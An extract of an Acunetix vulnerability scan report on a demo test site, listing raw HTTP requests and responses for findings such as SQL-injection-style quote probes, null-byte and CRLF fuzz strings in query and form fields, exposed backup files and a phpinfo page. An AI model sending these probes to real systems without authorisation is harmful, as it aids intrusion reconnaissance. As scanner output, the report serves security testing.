Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=%2527 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

219

/listproducts.php Details Request GET /listproducts.php?artist=%00' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=%00' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=%2527 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit

220

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=acunetix'" HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=JyI%3D HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

221

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=\" HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=\' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request Acunetix Website Audit

222

POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 279 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname='[email protected][email protected]&urname [email protected][email protected]&uemail=111-222-1933emai [email protected][email protected][email protected] t&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 282 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=%00'[email protected][email protected]&urn [email protected][email protected]&uemail=111-222-1933e [email protected][email protected]&uaddress=111-222-1933email@address .tst&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

223

Host: testphp.vulnweb.com Content-Length: 288 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=acunetix'"[email protected][email protected] [email protected][email protected]&uemail=111-222 [email protected][email protected]&uaddress=111-222-1933email@ Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Backup files Severity Medium Type Validation Reported by module File checks Description

Impact

Recommendation

Affected items /index.bak Details Request GET /index.bak HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:42 GMT Content-Type: text/plain Acunetix Website Audit

224

Content-Length: 3265 Last-Modified: Wed, 11 May 2011 10:27:48 GMT Connection: close ETag: "4dca64a4-cc1" /index.zip Details Request GET /index.zip HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:42 GMT Content-Type: application/zip Content-Length: 3265 Last-Modified: Mon, 09 Jul 2007 10:42:54 GMT Connection: close ETag: "4692112e-cc1" Accept-Ranges: bytes

Cookie manipulation Severity Medium Type Validation Reported by module Parameter manipulation Description

Impact

Recommendation

Affected items /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Acunetix Website Audit

225

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 162 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=111-222-19 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:50:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 124 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text=111-222-1933em [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 111 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

226

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submi t=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=ad d%20message Response HTTP/1.1 200 OK Acunetix Website Audit

227

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:23 GMT Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Acunetix Website Audit

228

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 85 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response Acunetix Website Audit

229

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:40:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 341 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:48:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 341 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected]&uphone=111-2 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:48:18 GMT Content-Type: text/html Acunetix Website Audit

230

Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 341 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=&uphone=111-2 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:48:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 341 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:48:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

231

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 341 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=[email protected][email protected]&uphone=111-2 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:48:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:52 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=&size =160 HTTP/1.0 Accept: */* Acunetix Website Audit

232

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:52 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Insecure crossdomain.xml Severity Medium Type Configuration Reported by module Scripting Description

Impact

Recommendation

Affected items Server Details Server Details

PHPinfo page found Acunetix Website Audit

233

Severity Medium Type Validation Reported by module Directory checks Description

Impact

Recommendation

Affected items /secured/phpinfo.php Details Request GET /secured/phpinfo.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:58:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/phpinfo.php Details

Request GET /secured/phpinfo.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit

234

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/phpinfo.php Details

Request GET /secured/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/secured/phpinfo.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Source code disclosure Severity Medium Type Validation Reported by module Text search Description

Impact

Recommendation

Affected items /index.bak Details

Request Acunetix Website Audit

235

GET /index.bak HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:42 GMT Content-Type: text/plain Content-Length: 3265 Last-Modified: Wed, 11 May 2011 10:27:48 GMT Connection: close ETag: "4dca64a4-cc1" Accept-Ranges: bytes

Application error message Severity Low Type Validation Reported by module Parameter manipulation Description

Impact

Recommendation

Affected items /listproducts.php Details Request GET /listproducts.php?artist=\'\");|]*{%0d%0a<%00 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:00 GMT Acunetix Website Audit

236

Content-Type: text/html Connection: close /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=\'\");|]*{%0d%0a<%00 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

237

